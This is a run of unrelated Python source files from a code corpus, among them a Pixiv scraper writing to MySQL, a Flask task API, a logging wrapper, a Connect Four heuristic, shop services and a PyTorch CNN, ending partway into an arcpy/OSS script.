i: index and work_info: element in the loop\n for i, work_info in enumerate(works_info.response):\n # Skip R-18 works\n if 'R-18' in work_info.tags:\n continue\n\n # Download\n work_title = work_info.title.replace(\"/\", \"-\") # '/' would be treated as a path separator, so replace it\n\n illust_cursor = connection.cursor()\n # Check the tags\n try:\n for tag_item in work_info.tags:\n tag_check_cursor = connection.cursor()\n tag_check_cursor.execute(\"SELECT tag_id FROM tag WHERE tag_name=%s\", [tag_item])\n\n tag_id = tag_check_cursor.fetchone()\n if tag_id is None:\n tag_id = str(ulid.new())\n illust_cursor.execute(\n \"INSERT INTO tag (tag_id, tag_name) VALUES (%s, %s)\",\n (\n tag_id,\n tag_item\n )\n )\n\n illust_cursor.execute(\n \"INSERT INTO illust_tag (illust_id, tag_id) VALUES (%s, %s)\",\n (\n work_info.id,\n tag_id\n )\n )\n\n if work_info.is_manga:\n # Manga\n if not os.path.exists(saving_direcory_path + '/' + str(work_info.id)):\n os.mkdir(saving_direcory_path + '/' + str(work_info.id))\n\n manga_info = api.works(work_info.id)\n illust_name = str(ulid.new())\n for page_no in range(0, manga_info.response[0].page_count):\n page_info = manga_info.response[0].metadata.pages[page_no]\n aapi.download(page_info.image_urls.large, path=saving_direcory_path + '/' + str(work_info.id), name=illust_name + '_' + str(page_no) + \".jpg\")\n else:\n # Single illustration\n illust_name = str(ulid.new())\n aapi.download(work_info.image_urls.large, path=saving_direcory_path, name=illust_name + \".jpg\")\n\n
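 # Added note (not in the original script): ulid.new() yields IDs that sort\n # lexicographically by creation time, so illust_name doubles as a stable,\n # time-ordered file name.\n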
 illust_cursor.execute(\n \"INSERT INTO illust (illust_id, user_id, title, url, caption, illust_name, views_count, favorited_count, create_date, update_date, page_count)\" +\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\",\n [\n work_info.id,\n user_id,\n work_title,\n work_info.image_urls.large,\n work_info.caption,\n illust_name,\n work_info.stats.views_count,\n work_info.stats.favorited_count.public + work_info.stats.favorited_count.private,\n work_info.created_time,\n work_info.reuploaded_time,\n work_info.page_count\n ]\n )\n connection.commit()\n sleep(1)\n except MySQLdb._exceptions.IntegrityError:\n connection.rollback()\n except PixivError:\n connection.rollback()\n\nprint(\"\\nThat\\'s all.\")\n\n# DELETE FROM illust;\n# DELETE FROM illust_tag;\n# DELETE FROM user;\n# DELETE FROM tag;\n","sub_path":"public/get_pixiv_illust.py","file_name":"get_pixiv_illust.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"343814439","text":"from z3 import *\ndef verifica_inteiro(n):\n # z3 solver\n\n s = Solver()\n\n aloc = {}\n for pombo in range(n): # create the z3 variables (one per pigeon)\n aloc[pombo] = Int(str(pombo))\n s.add(0 <= aloc[pombo], aloc[pombo] < n-1) # a valid perch\n\n for pombo in aloc:\n for pombo2 in aloc:\n if pombo != pombo2:\n s.add(aloc[pombo] != aloc[pombo2])\n\n if s.check() == sat:\n m = s.model()\n print(m)\n return True\n else:\n return False\n\n\nfor n in range(2, 10):\n z = verifica_inteiro(n)\n print(z)\n
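\n# Added note (not in the original): with n pigeons and only n-1 perches this is\n# the pigeonhole principle, so s.check() is unsat and the function returns False\n# for every n tested above. The pairwise loop could also be written with z3's\n# built-in constraint: s.add(Distinct(*[aloc[p] for p in aloc]))\n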
","sub_path":"3ºAno/1ºSemestre/LC/aula2/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"192013051","text":"#\n#\tLogging.py\n#\n#\t(c) 2020 by Andreas Kraft\n#\tLicense: BSD 3-Clause License. See the LICENSE file for further details.\n#\n#\tWrapper for the logging sub-system. It provides simpler access as well as\n#\tsome more useful output rendering.\n#\n\n\"\"\"\tWrapper class for the logging subsystem. \"\"\"\n\nimport logging, logging.handlers, os, inspect, re, sys, datetime\nfrom logging import StreamHandler\nfrom Configuration import Configuration\n\nlevelName = {\n\tlogging.INFO : 'ℹ️ I',\n\tlogging.DEBUG : '🐞 D',\n\tlogging.ERROR : '🔥 E',\n\tlogging.WARNING : '⚠️ W'\n\t# logging.INFO : 'INFO ',\n\t# logging.DEBUG : 'DEBUG ',\n\t# logging.ERROR : 'ERROR ',\n\t# logging.WARNING : 'WARNING'\n}\n\nclass\tLogging:\n\t\"\"\" Wrapper class for the logging subsystem. This class wraps the \n\t\tinitialization of the logging subsystem and provides convenience \n\t\tmethods for printing log, error and warning messages to a \n\t\tlogfile and to the console.\n\t\"\"\"\n\n\tlogger \t\t\t= None\n\tlogLevel \t\t\t= logging.INFO\n\tloggingEnabled\t\t= True\n\tenableFileLogging\t= True\n\n\t@staticmethod\n\tdef init():\n\t\t\"\"\"Init the logging system.\n\t\t\"\"\"\n\n\t\tif Logging.logger is not None:\n\t\t\treturn\n\t\tLogging.enableFileLogging \t= Configuration.get('logging.enableFileLogging')\n\t\tLogging.logLevel \t\t\t= Configuration.get('logging.level')\n\t\tLogging.loggingEnabled\t\t= Configuration.get('logging.enable')\n\t\tLogging.logger\t\t\t\t= logging.getLogger('logging')\n\n\t\t# Log to file only when file logging is enabled\n\t\tif Logging.enableFileLogging:\n\t\t\tlogfile = Configuration.get('logging.file')\n\t\t\tos.makedirs(os.path.dirname(logfile), exist_ok=True)# create log directory if necessary\n\t\t\tlogfp\t\t\t\t= logging.handlers.RotatingFileHandler( logfile,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmaxBytes=Configuration.get('logging.size'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbackupCount=Configuration.get('logging.count'))\n\t\t\tlogfp.setLevel(Logging.logLevel)\n\t\t\tlogfp.setFormatter(logging.Formatter('%(levelname)s %(asctime)s %(message)s'))\n\t\t\tLogging.logger.addHandler(logfp) \n\n\t\tLogging.logger.setLevel(Logging.logLevel)\n\n\t\n\n\t@staticmethod\n\tdef log(msg, withPath=True):\n\t\t\"\"\"Print a log message with level INFO.\n\t\t\"\"\"\n\t\tLogging._log(logging.INFO, msg, withPath)\n\n\n\t@staticmethod\n\tdef logDebug(msg, withPath=True):\n\t\t\"\"\"Print a log message with level DEBUG.\n\t\t\"\"\"\n\t\tLogging._log(logging.DEBUG, msg, withPath)\n\n\n\t@staticmethod\n\tdef logErr(msg, withPath=True):\n\t\t\"\"\"Print a log message with level ERROR.\n\t\t\"\"\"\n\t\timport CSE\n\t\tCSE.event.logError()\t# raise logError event\n\t\tLogging._log(logging.ERROR, msg, withPath)\n\n\n\t@staticmethod\n\tdef logWarn(msg, withPath=True):\n\t\t\"\"\"Print a log message with level WARNING.\n\t\t\"\"\"\n\t\timport CSE\n\t\tCSE.event.logWarning()\t# raise logWarning event\n\t\tLogging._log(logging.WARNING, msg, withPath)\n\n\n\t@staticmethod\n\tdef _log(level, msg, withPath):\n\t\ttry:\n\t\t\tif Logging.loggingEnabled and Logging.logLevel <= level:\n\t\t\t\tcaller = inspect.getframeinfo(inspect.stack()[2][0])\n\t\t\t\tif withPath:\n\t\t\t\t\tmsg = '(%s:%d) %s' % (os.path.basename(caller.filename), caller.lineno, msg)\n\t\t\t\t#print( \"(\" + time.ctime(time.time()) + \") \" + msg)\n\t\t\t\tprint('%s %s %s' % (levelName[level], datetime.datetime.now().isoformat(sep=' ', timespec='milliseconds'), msg))\n\t\t\t\tLogging.logger.log(level, msg)\n\t\texcept:\n\t\t\tpass\n\n\n#\n#\tRedirect handler to redirect other log output to our log\n#\n\nclass RedirectHandler(StreamHandler):\n\n\tdef __init__(self, topic):\n\t\tStreamHandler.__init__(self)\n\t\tself.topic = topic\n\n\tdef emit(self, record):\n\t\tmsg = '(%s) %s' % (self.topic, record.getMessage())\n\t\tmsg = re.sub(r'\\[.+?\\] ', '', msg) # clean up (remove superfluous date and time)\n\t\tif record.levelno == logging.DEBUG:\n\t\t\tLogging.logDebug(msg, False)\n\t\telif record.levelno == logging.INFO:\n\t\t\tLogging.log(msg, False)\n\t\telif record.levelno == logging.WARNING:\n\t\t\tLogging.logWarn(msg, False)\n\t\telif record.levelno == logging.ERROR:\t# fixed: LogRecord has no levelName attribute; compare the numeric levelno\n\t\t\tLogging.logErr(msg, False)\n
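\n#\n#\tAdded usage sketch (not in the original module; the 'werkzeug' logger name is\n#\tjust an illustrative assumption): another library's output can be redirected\n#\tinto this log with, e.g.:\n#\n#\t\timport logging\n#\t\tlogging.getLogger('werkzeug').addHandler(RedirectHandler('http'))\n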
False)\n","sub_path":"acme/Logging.py","file_name":"Logging.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"367551740","text":"#!/usr/bin/python3\nimport statistics as stats\n\n\nclass Encoder:\n\n def __init__(self, unique_values, is_categorical):\n \"\"\"\n Constructor of an Encoder using one-hot-encoding\n \"\"\"\n\n self.is_categorical = is_categorical\n self.is_binary = len(unique_values) == 2\n self.unique_values = unique_values\n if not is_categorical and not self.is_binary: \n # Use the lower bound and the upper bound of standard deviation band\n # to one-hot-encode continuous value\n self.unique_values = self.__get_stdev_band(unique_values)\n\n\n def __get_stdev_band(self, unique_values):\n \"\"\"\n Get the lower bound and upper bound for the standard devaitation band\n for continuous value. \n \"\"\"\n\n mean = stats.mean(unique_values)\n stdev = stats.stdev(unique_values)\n return [mean - stdev, mean + stdev]\n\n\n def encode(self, value):\n \"\"\"\n Get one-hot encoding for a value based on the \n unique values in this encoder.\n\n Return a list of 0s except 1 at the index that matches the unique value\n index.\n \"\"\"\n\n encoded = []\n if self.is_binary:\n encoded.append(0 if value == self.unique_values[0] else 1)\n elif not self.is_categorical:\n lower_bound = self.unique_values[0]\n upper_bound = self.unique_values[1]\n encoded.append(1 if lower_bound < value < upper_bound else 0)\n else: \n for index in range(len(self.unique_values)):\n unique = self.unique_values[index]\n encoded.append(1 if value == unique else 0)\n\n return encoded","sub_path":"Project5/encoding.py","file_name":"encoding.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"114160196","text":"from flask import Flask, jsonify\nfrom flask_restful import Resource, Api, reqparse\nfrom flask.ext.mysql import MySQL\nimport db_info # Database login information\n\napp = Flask(__name__)\napi = Api(app)\n\nmysql = MySQL()\napp.config['MYSQL_DATABASE_USER'] = db_info.db_user\napp.config['MYSQL_DATABASE_PASSWORD'] = db_info.db_pw\napp.config['MYSQL_DATABASE_DB'] = db_info.db_name\napp.config['MYSQL_DATABASE_HOST'] = db_info.db_host\napp.config['MYSQL_USE_UNICODE'] = 'True'\nmysql.init_app(app)\n\nclass CreateUser(Resource):\n def post(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('username', type=str, help='Gmail of user')\n args = parser.parse_args()\n\n _username = args['username']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('createUser', args=[_username])\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return { 'statuscode': '200', 'message': 'User creation success' }\n else:\n return { 'statuscode': '1000', 'message': str(data[0]) }\n\n except Exception as e:\n return { 'error': str(e) }\n\nclass AddTask(Resource):\n def post(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('username', type=str, help='Owner of task')\n parser.add_argument('deadline', type=str, help='Complete by date')\n parser.add_argument('description', type=str, help='Detail of task')\n args = parser.parse_args()\n\n _username = args['username']\n _deadline = args['deadline']\n _description = args['description']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('add_task', (_username, _deadline, _description))\n data = 
cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return { 'statuscode': '200', 'message': 'Successfully added task' }\n else:\n return { 'statuscode': '1000', 'message': str(data[0]) }\n\n except Exception as e:\n parser = reqparse.RequestParser()\n parser.add_argument('username', type=str, help='Owner of task')\n parser.add_argument('deadline', type=str, help='Complete by date')\n parser.add_argument('description', type=str, help='Detail of task')\n args = parser.parse_args()\n return { 'error': str(e) }\n\nclass DeleteTask(Resource):\n def delete(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('taskid', type=int, help='Which task')\n args = parser.parse_args()\n\n _taskid = args['taskid']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('delete_task', args=[_taskid])\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return { 'statuscode': '200', 'message': 'Task deleted successfully' }\n else:\n return { 'statuscode': '1000', 'message': str(data[0]) }\n\n except Exception as e:\n return { 'error': str(e) }\n\nclass CheckTask(Resource):\n def post(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('taskid', type=int, help='Task ID')\n parser.add_argument('status', type=int, help='Task status')\n args = parser.parse_args()\n\n _taskid = args['taskid']\n _status = args['status']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('check_task', (_taskid, _status))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return { 'statuscode': '200', 'message': 'Checked task' + str(_status) }\n else:\n return { 'statuscode': '1000', 'message': str(data[0]) }\n\n except Exception as e:\n return { 'error': str(e) }\n\nclass GetTask(Resource):\n def get(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('username', type=str, help='Owner of tasks')\n args = parser.parse_args()\n\n _username = args['username']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('get_all_tasks', args=[_username])\n data = cursor.fetchall()\n\n task_list = []\n none_list = []\n for task in data:\n if task[1] is None:\n i = { 'taskid': task[0],\n 'deadline': 'none',\n 'description': task[2],\n 'status': task[3] }\n none_list.append(i)\n else:\n i = { 'taskid': task[0],\n 'deadline': str(task[1]),\n 'description': task[2],\n 'status': task[3] }\n task_list.append(i)\n\n return task_list + none_list\n\n except Exception as e:\n return { 'error': str(e) }\n\n\napi.add_resource(CreateUser, '/CreateUser')\napi.add_resource(AddTask, '/AddTask')\napi.add_resource(DeleteTask, '/DeleteTask')\napi.add_resource(CheckTask, '/CheckTask')\napi.add_resource(GetTask, '/GetTask')\nif __name__ == '__main__':\n app.run()\n\n","sub_path":"server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"524623817","text":"import json\nimport logging\nfrom importlib import import_module\nfrom typing import Any, Dict, Type, Union\n\nfrom fluent.handler import FluentRecordFormatter\n\n\nclass VerboseFluentRecordFormatter(FluentRecordFormatter):\n def __init__(\n self,\n *,\n raise_on_format_error: bool = False,\n encoder_class: Union[str, Type[json.JSONEncoder]] = json.JSONEncoder,\n encoder_options: Dict[str, Any] = None,\n **kwargs: Any,\n ) -> None:\n self.raise_on_format_error = raise_on_format_error\n self.encoder_class = encoder_class\n self.encoder_options = 
encoder_options or {}\n super().__init__(**kwargs)\n\n @property\n def encoder_class(self) -> Type[json.JSONEncoder]:\n return self._encoder_class\n\n @encoder_class.setter\n def encoder_class(self, encoder_class: Union[str, Type[json.JSONEncoder]]) -> None:\n if isinstance(encoder_class, str):\n project_name_underscore, class_name = encoder_class.rsplit(\".\", 1)\n module = import_module(project_name_underscore)\n self._encoder_class = getattr(module, class_name)\n elif issubclass(encoder_class, json.JSONEncoder):\n self._encoder_class = encoder_class\n else:\n raise TypeError(f\"Cannot set encoder class {str(encoder_class)}\")\n\n @property\n def encoder(self) -> json.JSONEncoder:\n if not hasattr(self, \"_encoder\"):\n self._encoder = self.encoder_class(**self.encoder_options)\n return self._encoder\n\n def json_encode(self, obj: Any) -> Dict:\n return json.loads(self.encoder.encode(obj))\n\n def _format_msg_default(self, record, msg):\n return {\"message\": record.getMessage()}\n\n def _structuring(self, data, record):\n msg = record.msg\n\n if isinstance(msg, dict):\n self._add_dic(data, self.json_encode(msg))\n if \"message\" not in data:\n data[\"message\"] = \"\"\n elif isinstance(msg, str):\n self._add_dic(data, self._format_msg_default(record, msg))\n else:\n self._add_dic(data, {\"message\": self.json_encode(msg)})\n\n def format(self, record):\n try:\n data = super().format(record)\n\n if \"data\" in record.__dict__:\n data[\"data\"] = self.json_encode(record.__dict__[\"data\"])\n\n except (ValueError, TypeError):\n sentry_logger = logging.getLogger(\"sentry\")\n sentry_logger.exception(\"Unserializable data was given to logger\")\n\n if self.raise_on_format_error:\n raise\n\n record.hostname = self.hostname\n data = self._formatter(record)\n data[\n \"message\"\n ] = \"Logger ({}) is receiving non serializable data, please check sentry.\".format(\n record.name\n )\n\n return data\n","sub_path":"cornershop-backend-test/backend_test/logging_formatter.py","file_name":"logging_formatter.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"471741170","text":"import array\nimport time\n\ndef getShortestUniqueSubstring(arr,str):\n\theadIndex = 0\n\tresult = \"\"\n\tuniqueCounter = 0\n\tcountMap = Map()\n\n\t# Initialize countMap\n\tfor i in range(len(arr)):\n\t\tcountMap.setValueOf(arr[i],0)\n\n\t#scan string\n\tfor tailIndex in range(len(str)):\n\t\ttailChar = str[tailIndex]\n\t\t\n\t\t#Skip all the characters not in arr\n\t\tif countMap.keyExists(tailChar) == False:\n\t\t\tcontinue\n\t\t\n\t\ttailCount = countMap.getValueOf(tailChar)\n\t\tif tailCount == 0:\n\t\t\tuniqueCounter = uniqueCounter + 1\n\n\t\tcountMap.setValueOf(tailChar, tailCount + 1)\n\n\t\t# push head forward\n\t\twhile uniqueCounter == len(arr):\n\t\t\ttempLength = tailIndex - headIndex + 1\n\t\t\tif tempLength == len(arr):\n\t\t\t\t#return a substring of str from\n\t\t\t\t# headIndex to tailIndex(inclusive)\n\t\t\t\treturn str[headIndex:tailIndex+1]\n\n\t\t\tif result == \"\" or tempLength < len(result):\n\t\t\t\t#return a substring of str from\n\t\t\t\t# headIndex to tailIndex(inclusive)\n\t\t\t\tresult = str[headIndex:tailIndex+1]\n\n\t\t\theadChar = str[headIndex]\n\n\t\t\tif countMap.keyExists(headChar):\n\t\t\t\theadCount = countMap.getValueOf(headChar) -1\n\t\t\tif headCount == 0:\n\t\t\t\tuniqueCounter = uniqueCounter - 1\n\t\t\tcountMap.setValueOf(headChar, headCount)\n\n\t\t\theadIndex = headIndex + 
1\n\n\treturn result\nclass Map:\n\t\n\tHashTable = {}\n\t\n\tdef getValueOf(self,char):\n\t\treturn self.HashTable[char]\n\t\n\tdef setValueOf(self,char,int):\n\t\tself.HashTable[char] = int\n\n\tdef keyExists(self,char):\n\t\treturn char in self.HashTable.keys()\n\nif __name__ == \"__main__\":\n\tarr = array.array('u',['a','b','c'])\n\tstr = \"abdaaabanc\"\n\t\n\tprint(getShortestUniqueSubstring(arr,str))\n","sub_path":"getShortestUniqueSubstring4.py","file_name":"getShortestUniqueSubstring4.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"248472833","text":"def uniqueCharacters(str): \n \n # Using sorting; sorted() returns a new list \n # (the original called sorted(str) and discarded the result, so non-adjacent duplicates went undetected) \n str = sorted(str) \n \n for i in range(len(str)-1): \n \n # if at any time, 2 adjacent \n # elements become equal, \n # return false \n if (str[i] == str[i + 1]) : \n return False\n \n return True\n \n# e.g. uniqueCharacters(\"abc\") -> True, uniqueCharacters(\"aab\") -> False\n\nstr = input(\"enter your string:\")\n \nif (uniqueCharacters(str)) : \n print(\"The String\",str,\"has all unique characters\\n\") \n \nelse : \n print(\"The String\",str,\"has duplicate characters\\n\") \n","sub_path":"an algorithm to determine if a string has all unique characters.py","file_name":"an algorithm to determine if a string has all unique characters.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"311620468","text":"import os\n\nfrom MasterUI.UserInteraction import *\nclass ScenarioUserInteraction(UserInteraction):\n def run(self, options):\n input_checker = InputChecker()\n console_input = ConsoleInput()\n response = input_checker.InputCheck(console_input.choice(), options)\n if (response != 0 and response != 1):\n response.run()\n elif response == 0:\n Flow.quit()\n else:\n cprint(\"Command not understood, please retype\", 'blue', attrs=['bold'])\n self.run(options)\n\nclass PathChecker():\n def check_path(self, dir_path):\n if os.path.exists(dir_path):\n return 1\n else:\n return 0\n\nclass UserPath():\n def __init__(self):\n self.path_check = PathChecker()\n self.console_input = ConsoleInput()\n\n def check(self):\n self.choice = self.console_input.choice()\n if self.path_check.check_path(self.choice):\n return self.choice\n else:\n cprint(\"Path does not exist. 
Please retype\", 'blue', attrs=['bold'])\n self.check()\n return 0\n\n def run(self):\n cprint(\"Please type a path to place where you want to make your project\", attrs=['bold'])\n return self.check()","sub_path":"MasterProject/InsideUserHandler.py","file_name":"InsideUserHandler.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"645792948","text":"import games\n\n\ndef h1(state, player):\n horizontales = 0\n verticales = 0\n diagonales = 0\n\n if not state.utility == 0:\n if player == 'X':\n return state.utility * 10000\n else:\n return -state.utility * 10000\n for x in range(1, 8):\n for y in range(1, 7):\n if ((x, y)) in games.ConnectFour().legal_moves(state):\n equis = x\n ygriega = y\n horizontales = horizontales + chorizontales(state, player, equis, ygriega)\n verticales = verticales + cverticales(state, player, equis, ygriega)\n diagonales = diagonales + cdiagonales(state, player, equis, ygriega)\n\n return horizontales + verticales + diagonales\n\n\ndef chorizontales(state, player, equis, ygriega):\n suma = 0\n vectores = [[1, 2, 3, 4], [2, 3, 4, 5], [3, 4, 5, 6], [4, 5, 6, 7]]\n for z in range(0, 4):\n if equis in vectores[z]:\n suma = suma + valor(state, player, equis, ygriega, vectores[z])\n\n return suma\n\n\ndef valor(state, player, equis, ygriega, vector):\n count = 0\n rcount = 0\n for x in range(0, 4):\n if equis == vector[x]:\n if player == 'X':\n count = count + 10\n rcount = 0\n else:\n count = 0\n rcount = rcount + 10\n continue\n if state.board.get((vector[x], ygriega)) == 'X':\n count = count + 10\n rcount = 0\n if state.board.get((vector[x], ygriega)) == '.':\n count = count + 1\n rcount = rcount + 1\n if state.board.get((vector[x], ygriega)) == 'O':\n count = 0\n rcount = rcount + 10\n ##if (count == 0 or rcount == 0) and x >= 6:\n ##return 0\n if player == 'O':\n return rcount - count\n return count - rcount\n\n\ndef cverticales(state, player, equis, ygriega):\n count = 0\n rcount = 0\n for y in range(1, 7):\n if ygriega == y:\n if player == 'X':\n count = count + 10\n rcount = 0\n else:\n count = 0\n rcount = rcount + 10\n continue\n if state.board.get((equis, y)) == 'X':\n count = count + 10\n rcount = 0\n if state.board.get((equis, y)) == '.':\n count = count + 1\n rcount = rcount + 1\n if state.board.get((equis, y)) == 'O':\n count = 0\n rcount = rcount + 10\n ##if (count ==0 or rcount ==0) and y > 4:\n ## return 0\n if player == 'O':\n return rcount - count\n return count - rcount\n\n\ndef cdiagonales(state, player, equis, ygriega):\n seguidas = 0\n rseguidas = 0\n count = 0\n rcount = 0\n\n x = equis - 5\n y = ygriega - 5\n while x < 8 and y < 7:\n if x < 1 or y < 1:\n x = x + 1\n y = y + 1\n continue\n if state.board.get(x, y) == 'X':\n seguidas = seguidas + 1\n rseguidas = 0\n count = count + 10\n rcount = 0\n if state.board.get(x, y) == 'O':\n seguidas = 0\n rseguidas = rseguidas + 1\n count = 0\n rcount = rcount + 10\n if state.board.get(x, y) == '.':\n count = count + 1\n rcount = rcount + 1\n x = x + 1\n y = y + 1\n\n aseguidas = 0\n arseguidas = 0\n x = equis + 5\n y = ygriega - 5\n while x > 0 and y < 7:\n if x == equis and y == ygriega:\n if player == 'X':\n aseguidas = aseguidas + 1\n arseguidas = 0\n elif player == 'O':\n arseguidas = arseguidas + 1\n aseguidas = 0\n if x > 7 or y < 1:\n x = x + 1\n y = y + 1\n continue\n if state.board.get(x, y) == 'X':\n aseguidas = aseguidas + 1\n arseguidas = 0\n count = count + 10\n rcount = 0\n if 
state.board.get(x, y) == 'O':\n aseguidas = 0\n arseguidas = arseguidas + 1\n count = 0\n rcount = rcount + 10\n if state.board.get(x, y) == '.':\n count = count + 1\n rcount = rcount + 1\n x = x - 1\n y = y + 1\n\n if player == 'O':\n if rseguidas == 3 or arseguidas == 3:\n rseguidas = rseguidas + 1000\n return (rcount - count) + rseguidas\n if seguidas == 3 or aseguidas == 3:\n aseguidas += 1000\n return (count - rcount) + aseguidas\n","sub_path":"heuristic.py","file_name":"heuristic.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"287381757","text":"# coding:utf8\n\"\"\"\n\nAuthor: ilcwd\n\"\"\"\nimport datetime\n\nfrom ..models import (\n catalog as _catalog,\n good as _good,\n contact as _contact,\n)\nfrom hoshop.core import misc\n\nfrom .dtos import HoShopDTO\n\n\ndef find_catalogs():\n return HoShopDTO(data=dict(\n catalogs=_catalog.find_catalogs(),\n ))\n\n\ndef create_catalog(name):\n catalog = _catalog.create_catalog(name)\n if catalog is not None:\n return HoShopDTO(data=catalog.dictify())\n\n return HoShopDTO(error='create catalog fail')\n\n\ndef show_goods():\n catalogs = _catalog.find_catalogs()\n goods = _good.find_goods()\n\n return HoShopDTO(data=dict(\n catalogs=catalogs,\n goods=goods,\n ))\n\n\ndef update_goods(goodid, **kw):\n if 'price' in kw:\n kw['price'] = misc.encode_price(kw.pop('price'))\n if 'expired_time' in kw:\n kw['expired_time'] = datetime.datetime.strptime(kw.pop('expired_time'), '%Y-%m-%d')\n\n if _good.update_good(goodid, **kw):\n return HoShopDTO()\n\n return HoShopDTO(error=u'更新商品失败')\n\n\ndef get_primary_contact(userid):\n c = _contact.get_default_contact(userid)\n if c:\n return HoShopDTO(data=c)\n return HoShopDTO(error=\"not found\")\n\n\ndef set_primary_contact(userid, contactid):\n c = _contact.get_contact(contactid)\n if not c:\n return HoShopDTO(error=\"contact not found\")\n\n ok = _contact.set_default_contact(userid, contactid) == 1\n if ok:\n return HoShopDTO()\n\n return HoShopDTO(error=\"set primary contact fail\")\n\n\ndef find_contacts(userid):\n cs = _contact.find_contacts(userid)\n r = {'contacts': cs, 'default': None}\n if cs:\n r['default'] = _contact.get_default_contact(userid)\n return HoShopDTO(data=r)\n\n\ndef delete_contact(userid, contactid):\n if _contact.delete_contact(userid, contactid):\n return HoShopDTO()\n\n return HoShopDTO(error='delete contact fail')\n\n\ndef create_good(name, price, catalogid, total=99999999, description='', start_time=None, expired_time=None):\n price = misc.encode_price(price)\n c = _catalog.get_catalog(catalogid);\n rows = _good.create_good(name, price, catalogid, total, description, start_time, expired_time)\n\n if rows == 1:\n return HoShopDTO(data='')\n\n return HoShopDTO(error='create good fail')","sub_path":"hoshop/services/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"482618503","text":"import torch\nimport torch.nn as nn\n\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\nnpixels=128\nclass ConvNet(nn.Module):\n def __init__(self, num_output=2):\n super(ConvNet, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=8, stride=1, padding=4),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.AvgPool2d(kernel_size=2, 
stride=2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=7, stride=1, padding=3),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.AvgPool2d(kernel_size=2, stride=2))\n self.layer3 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=6, stride=1, padding=3),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.AvgPool2d(kernel_size=2, stride=2))\n self.layer4 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=6, stride=1, padding=3),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.AvgPool2d(kernel_size=2, stride=2))\n self.fc1 = nn.Sequential(nn.Linear(64*(npixels//(2*2*2*2))*(npixels//(2*2*2*2)), 196), nn.ReLU())\n self.bn1 = nn.Sequential(nn.BatchNorm1d(196))\n self.fc2 = nn.Sequential(nn.Linear(196, 98), nn.ReLU())\n self.bn2 = nn.Sequential(nn.BatchNorm1d(98))\n self.fc3 = nn.Sequential(nn.Linear(98, 11), nn.ReLU())\n self.bn3 = nn.Sequential(nn.BatchNorm1d(11))\n self.fc4 = nn.Sequential(nn.Linear(11, num_output))\n#----------------------------------------------------------------------------------------\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = out.view(-1, 64*(npixels//(2*2*2*2))*(npixels//(2*2*2*2)))\n out = self.fc1(out)\n out = self.bn1(out)\n out = nn.functional.dropout(out,0.5)\n out = self.fc2(out)\n out = self.bn2(out)\n out = nn.functional.dropout(out,0.5)\n out = self.fc3(out)\n out = self.bn3(out)\n out = self.fc4(out)\n return out\n\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n","sub_path":"Deep_Learning_Vertexing/scripts/MyModelClass.py","file_name":"MyModelClass.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"246381392","text":"# _*_ coding: utf-8 _*_\n# !/usr/bin/python\n__author__ = 'ma_keling'\n# Version : 1.1.0\n# Start Time : 2017-12-07\n# Update Time : 2018-7-20\n# Change Log :\n##\n\nimport os\nimport sys\nimport zipfile\nimport arcpy\nimport oss2\nimport shutil\n\n# Defines the 